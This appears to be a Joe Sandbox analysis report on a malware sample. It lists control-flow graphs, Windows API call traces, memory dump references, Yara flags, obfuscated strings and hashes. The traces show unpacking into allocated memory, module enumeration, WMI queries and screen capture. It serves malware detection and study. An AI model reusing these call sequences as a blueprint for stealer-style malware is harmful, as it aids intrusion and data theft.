                                                                                                                                                                                                                              control_flow_graph 0 214003c-2140047 1 214004c-2140263 call 2140a3f call 2140e0f call 2140d90 VirtualAlloc 0->1 2 2140049 0->2 17 2140265-2140289 call 2140a69 1->17 18 214028b-2140292 1->18 2->1 23 21402ce-21403c2 VirtualProtect call 2140cce call 2140ce7 17->23 20 21402a1-21402b0 18->20 22 21402b2-21402cc 20->22 20->23 22->20 29 21403d1-21403e0 23->29 30 21403e2-2140437 call 2140ce7 29->30 31 2140439-21404b8 VirtualFree 29->31 30->29 33 21405f4-21405fe 31->33 34 21404be-21404cd 31->34 37 2140604-214060d 33->37 38 214077f-2140789 33->38 36 21404d3-21404dd 34->36 36->33 42 21404e3-2140505 LoadLibraryA 36->42 37->38 43 2140613-2140637 37->43 40 21407a6-21407b0 38->40 41 214078b-21407a3 38->41 44 21407b6-21407cb 40->44 45 214086e-21408be LoadLibraryA 40->45 41->40 46 2140517-2140520 42->46 47 2140507-2140515 42->47 48 214063e-2140648 43->48 49 21407d2-21407d5 44->49 53 21408c7-21408f9 45->53 50 2140526-2140547 46->50 47->50 48->38 51 214064e-214065a 48->51 54 2140824-2140833 49->54 55 21407d7-21407e0 49->55 56 214054d-2140550 50->56 51->38 52 2140660-214066a 51->52 59 214067a-2140689 52->59 61 2140902-214091d 53->61 62 21408fb-2140901 53->62 60 2140839-214083c 54->60 63 21407e4-2140822 55->63 64 21407e2 55->64 57 2140556-214056b 56->57 58 21405e0-21405ef 56->58 65 214056d 57->65 66 214056f-214057a 57->66 58->36 67 2140750-214077a 59->67 68 214068f-21406b2 59->68 60->45 69 214083e-2140847 60->69 62->61 63->49 64->54 65->58 70 214057c-2140599 66->70 71 214059b-21405bb 66->71 67->48 72 21406b4-21406ed 68->72 73 21406ef-21406fc 68->73 74 2140849 69->74 75 214084b-214086c 69->75 83 21405bd-21405db 70->83 71->83 72->73 77 21406fe-2140748 73->77 78 214074b 73->78 74->45 75->60 77->78 78->59 83->56
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0214024D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                              • String ID: cess$kernel32.dll
                                                                                                                                                                                                                              • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                              • Instruction ID: 48cea063c97ef949dd5434e3ad27270cf03c1d81571c479ac5389c31e4d80e02
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52527974A01229DFDB64CF59C984BACBBB1BF09304F1580E9E94DAB351DB30AA85DF14

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 233 5a41be-5a41d7 234 5a41d9-5a41db 233->234 235 5a41dd 234->235 236 5a41e2-5a41ee CreateToolhelp32Snapshot 234->236 235->236 237 5a41fe-5a420b Module32First 236->237 238 5a41f0-5a41f6 236->238 239 5a420d-5a420e call 5a3e7d 237->239 240 5a4214-5a421c 237->240 238->237 243 5a41f8-5a41fc 238->243 244 5a4213 239->244 243->234 243->237 244->240
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005A41E6
                                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 005A4206
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788938311.00000000005A3000.00000040.00000020.00020000.00000000.sdmp, Offset: 005A3000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_5a3000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                              • Instruction ID: b054e03b8dbdffb023a3c8db63c5d0f4fe16ad374484c3758d19082158501458
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDF062351007116BD7202AF9988DB6E7AE8BF9A724F100529F646910C0DBB0EC858E61

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 246 2140e0f-2140e24 SetErrorMode * 2 247 2140e26 246->247 248 2140e2b-2140e2c 246->248 247->248
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetErrorMode.KERNELBASE(00000400,?,?,02140223,?,?), ref: 02140E19
                                                                                                                                                                                                                              • SetErrorMode.KERNELBASE(00000000,?,?,02140223,?,?), ref: 02140E1E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                                                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                              • Instruction ID: 418359fe583fdca0451b961dad85c986a59d45351fffe631a80bdbc895422709
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FD0123114512877D7002B95DC09BCD7B1CDF09B66F108011FB0DE9080CB70954046E5

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 281 440260-440271 282 4402a5-4402a6 call 43eb40 281->282 283 440286-440298 call 441850 RtlReAllocateHeap 281->283 284 440278-44027f 281->284 285 44029a-4402a3 call 43eb20 281->285 291 4402ab-4402ae 282->291 292 4402b0-4402b2 283->292 284->282 284->283 285->292 291->292
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B9C7,00000000,00000001), ref: 00440292
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: e3ca6a36a028ff54866f16376779860b9096701dd45936173a9f18f59b7a354d
                                                                                                                                                                                                                              • Instruction ID: c7e132dbbf166c87dd4ca7ba8e526d96017081e21b1d4d371130b4eff19db060
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3ca6a36a028ff54866f16376779860b9096701dd45936173a9f18f59b7a354d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3E02B32404310ABD2026F397C06B177674EFC6715F05087AF50156151DB38F811C5DE

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 293 40ab12-40ab5b call 441c40 * 2 WSAStartup
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • WSAStartup.WS2_32(00000202), ref: 0040AB46
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Startup
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 724789610-0
                                                                                                                                                                                                                              • Opcode ID: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
                                                                                                                                                                                                                              • Instruction ID: 8daa5b18d499817a70b2f557c0c6df6f58e6f2abf740e83111143c9212bc1643
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AE02B7A5D5104BBF2486751FD4FC563616BB4330AB08413DFC185017BD6511426C66A

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 299 43eb40-43eb4c 300 43eb53-43eb54 299->300 301 43eb55-43eb67 call 441850 RtlFreeHeap 299->301
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B9C7,00000000,00000001), ref: 0043EB60
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                                              • Opcode ID: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
                                                                                                                                                                                                                              • Instruction ID: 6306fd139b63709815d779222b474fbda691f96f30962fae2caf2063fc0eb5d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FDD0C931445536FBC6102F28BC06BCB3B94EF497A5F0708A5F540AA075E725DC918AD8

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 304 4404b1-4404c9 GetForegroundWindow call 4421e0 306 4404ce-4404e8 304->306
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 004404BF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2020703349-0
                                                                                                                                                                                                                              • Opcode ID: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
                                                                                                                                                                                                                              • Instruction ID: 7f86c14d6ce35f706de72b94d0a04e46592ace6e5707a2a12f6891b8fa8e10aa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15E0E2B9900214DBEB44CF68FC9592933B5EB8B3093040439E202C3362EA34E602CF59

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 308 43eb20-43eb37 call 441850 RtlAllocateHeap
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?,E931068D,004089CF,6W01), ref: 0043EB30
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
                                                                                                                                                                                                                              • Instruction ID: faa30900258afa928b287b4fa720072893bcbdc8cd762d9751037a3417221d58
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91C04C31045120ABD5506B15EC05BC63B54DF852A5F020065B105660718660ACC2C698
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005A3ECE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788938311.00000000005A3000.00000040.00000020.00020000.00000000.sdmp, Offset: 005A3000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_5a3000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                              • Instruction ID: 2957d9ad4d9c1ad35233572ce78d761a0dd5f6778fe88cd8c725fcfd5606d05a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB112C79A00208EFDB01DF98C985E98BFF5AB09350F058094F9489B362E375EA50DB80
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CoCreateInstance.OLE32(CDCCD3E7,00000000,00000001,?,00000000), ref: 0043BCCC
                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(37C935C6), ref: 0043BD46
                                                                                                                                                                                                                              • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043BD84
                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(37C935C6), ref: 0043BDE9
                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(37C935C6), ref: 0043BED0
                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0043BF3E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                                                                                                                              • String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
                                                                                                                                                                                                                              • API String ID: 65563702-2807872674
                                                                                                                                                                                                                              • Opcode ID: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
                                                                                                                                                                                                                              • Instruction ID: 0fa8c84a7900d0f22f2d4f21e88135ff08406c7ea1f94cba9a5970d36c475c8e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 735202726083408BD714CF68C88176BFBE1EF89314F189A2EE5D597391D778D806CB96
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CoCreateInstance.COMBASE(CDCCD3E7,00000000,00000001,?,00000000), ref: 0217BF33
                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(37C935C6), ref: 0217BFAD
                                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0217BFEB
                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(37C935C6), ref: 0217C050
                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(37C935C6), ref: 0217C137
                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0217C1A5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                                                                                                                              • String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
                                                                                                                                                                                                                              • API String ID: 65563702-2807872674
                                                                                                                                                                                                                              • Opcode ID: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
                                                                                                                                                                                                                              • Instruction ID: abccb7437a5f25747eb3a9d255d1a77c8c34903799d82ff5416a54d982792d46
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3852EF726483408BD724CF28C8917ABFBE1EFC5314F188A2EE5959B391D775D806CB92
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00436989
                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004C), ref: 00436999
                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004D), ref: 004369A1
                                                                                                                                                                                                                              • GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
                                                                                                                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 004369C1
                                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 004369D0
                                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004369E7
                                                                                                                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
                                                                                                                                                                                                                              • String ID: Y
                                                                                                                                                                                                                              • API String ID: 1298755333-3233089245
                                                                                                                                                                                                                              • Opcode ID: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
                                                                                                                                                                                                                              • Instruction ID: ce6842184c50d62c14bce23637ee5c5f438d7dfa952fd3edf86735d4080956a5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A81C33A158310EFD7489FB4AC49A3B7BA5FB8A352F050C3CF546D2290C73995168B2B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 004251AA
                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00425243
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                              • String ID: +$e$+$e$%\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f$XY$]RB
                                                                                                                                                                                                                              • API String ID: 237503144-2846770461
                                                                                                                                                                                                                              • Opcode ID: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
                                                                                                                                                                                                                              • Instruction ID: b6d59b0557f70d7ec2d4011febfa6e18cf4a5b2df19338a98cc8181bc2575411
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7F1EDB4208350DFD310DF69E89166BBBE0FFC5314F54892DE5958B362E7B88906CB46
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$T`Sf$Wdz$h.^$&$$qs$uVw
                                                                                                                                                                                                                              • API String ID: 0-1546758368
                                                                                                                                                                                                                              • Opcode ID: dbc9d13701a6f1f84a1fbda366b061da39485b638189b278c3f43e1cc0e4d0b6
                                                                                                                                                                                                                              • Instruction ID: c261d025133841230159ca5431fd9423a817dc7e9349410c690f11e8db15d26c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbc9d13701a6f1f84a1fbda366b061da39485b638189b278c3f43e1cc0e4d0b6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA7283B4A05269CFDB24CF55D881BDDBBB2FB46300F1181E9C5496B362DB349A86CF84
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 00419CE7
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 00419D24
                                                                                                                                                                                                                                • Part of subcall function 004402C0: LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                              • String ID: ~|$SP$h.^$if$pv$tj$vt
                                                                                                                                                                                                                              • API String ID: 764372645-2464491853
                                                                                                                                                                                                                              • Opcode ID: e0b58ed5ff15dc801148dc9f86a9132d6192a83ea1caeaa00bd99fa001171b69
                                                                                                                                                                                                                              • Instruction ID: c1c817f51924b2b6e01bbc71c3bfe870e6f9d21007064de5033cd7ab66586395
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0b58ed5ff15dc801148dc9f86a9132d6192a83ea1caeaa00bd99fa001171b69
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D624770609310AFE724CB15DC9176BB7E2EFC5314F18862DF495973A1D378AC858B4A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID: ~|$SP$h.^$if$pv$tj$vt
                                                                                                                                                                                                                              • API String ID: 3664257935-2464491853
                                                                                                                                                                                                                              • Opcode ID: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
                                                                                                                                                                                                                              • Instruction ID: 9f635b96097cd49acdd07c645060e594fcf8da95e9ee0a546a7bb086276b5772
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9620B70685360DFE724CF14CC91B2BB7E2EFC5318F18869CE8A597291D371A845CB96
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 5&'d$O$h.^$~
                                                                                                                                                                                                                              • API String ID: 0-2950856276
                                                                                                                                                                                                                              • Opcode ID: 8b914b4801975b71dea4b75609ed348123c7e1e6468bc6ef1cacffb89bf502a6
                                                                                                                                                                                                                              • Instruction ID: 7c8e188e2ff574dc84e1e58bec60109b2722ae2eee07efcef2931a8160e5a92b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b914b4801975b71dea4b75609ed348123c7e1e6468bc6ef1cacffb89bf502a6
